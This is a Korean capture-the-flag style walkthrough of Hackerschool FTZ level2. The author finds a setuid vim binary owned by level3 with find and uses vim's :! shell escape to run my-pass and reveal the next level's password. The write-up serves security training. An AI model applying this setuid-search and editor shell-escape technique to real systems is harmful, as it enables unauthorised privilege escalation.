[hackerschool FTZ] level2

level2를 풀어보겠다.

level1을 풀어 얻은 비밀번호를 입력하여 접속하면

[level2@ftz level2]$

제일 먼저 할 것은 ls -al 명령을 이용하여 level2의 파일과 디렉토리를 확인한다.

[level2@ftz level2]$ ls -al

total 80

drwxr-xr-x    4 root     level2       4096 Apr 19  2002 .

drwxr-xr-x   34 root     root         4096 Sep 10  2011 ..

-rw-------    1 root     root            1 Jan 15  2010 .bash_history

-rw-r--r--    1 root     root           24 Feb 24  2002 .bash_logout

-rw-r--r--    1 root     root          224 Feb 24  2002 .bash_profile

-rw-r--r--    1 root     root          151 Feb 24  2002 .bashrc

-rw-r--r--    1 root     root          400 Sep 24  2000 .cshrc

-rw-r--r--    1 root     root         4742 Sep 24  2000 .emacs

-rw-rw-r--    1 root     root          162 Mar 10  2000 .epems

-r--r--r--    1 root     root          319 Sep 24  2000 .gtkrc

-rw-r--r--    1 root     root          100 Sep 24  2000 .gvimrc

-rw-r--r--    1 root     root           60 Mar 23  2000 hint

-rw-r--r--    1 root     root          226 Sep 24  2000 .muttrc

-rw-r--r--    1 root     root          367 Sep 24  2000 .profile

drwxr-xr-x    2 root     level2       4096 Feb 24  2002 public_html

drwxrwxr-x    2 root     level2       4096 Jan 16  2009 tmp

-rw-r--r--    1 root     root            0 Oct 27  2002 .viminfo

-rw-r--r--    1 root     root         4145 Sep 24  2000 .vimrc

-rw-r--r--    1 root     root          245 Sep 24  2000 .Xdefaults

역시 hint 라는 파일이 존재한다.

hint 파일을 읽으면 

[level2@ftz level2]$ cat hint

텍스트 파일 편집 중 쉘의 명령을 실행시킬 수 있다는데...

그럼 텍스트 파일 편집 중 쉘의 명령을 실행 시킬수 있는지 알아보아야 한다.

텍스트파일 편집은 vi 을 사용한다.

vi 는 셸상에서 새로운 파일을 편집할 때 사용되는데 3가지 모드가 있다. 

 - 입력모드

   다른 편집기에서 타이핑을 하여 파일의 내용을 입력하는 과정

 - 명령모드

   다른 편집기의 편집 메뉴에서 제공하는 복사, 붙이기, 삭제 등의 편집기능

 - 콜론모드

   다른 편집기의 파일 메뉴에서 수행하는 멸기, 저장, 다른 이름으로 저장 등의 명령 수행

level3 권한에 setuid가 걸린 파일을 찾으면

[level2@ftz level2]$ find / -perm +6000 -user level3 2>/dev/null

/usr/bin/editor

editor 파일을 실행 시키면 

[level2@ftz level2]$ /usr/bin/editor

~

~

~

~

~

~                                           VIM - Vi IMproved

~

~                                            version 6.1.320

~                                        by Bram Moolenaar et al.

~                              Vim is open source and freely distributable

~

~                                     Help poor children in Uganda!

~                             type  :help iccf<Enter>       for information

~

~                             type  :q<Enter>               to exit

~                             type  :help<Enter>  or  <F1>  for on-line help

~                             type  :help version6<Enter>   for version info

~

~

~

~

~

vi 편집기가 실행이 된다.

[level2@ftz level2]$ /usr/bin/editor

~

~

~

~

~

~                                           VIM - Vi IMproved

~

~                                            version 6.1.320

~                                        by Bram Moolenaar et al.

~                              Vim is open source and freely distributable

~

~                                     Help poor children in Uganda!

~                             type  :help iccf<Enter>       for information

~

~                             type  :q<Enter>               to exit

~                             type  :help<Enter>  or  <F1>  for on-line help

~                             type  :help version6<Enter>   for version info

~

~

~

~

~

:!my-pass

my-pass명령을 이용해서 level3의 비밀번호를 얻어내는 명령을 치면

[level2@ftz level2]$ /usr/bin/editor

Level3 Password is "can you fly?".

level3의 비밀번호를 얻었다!!!!!!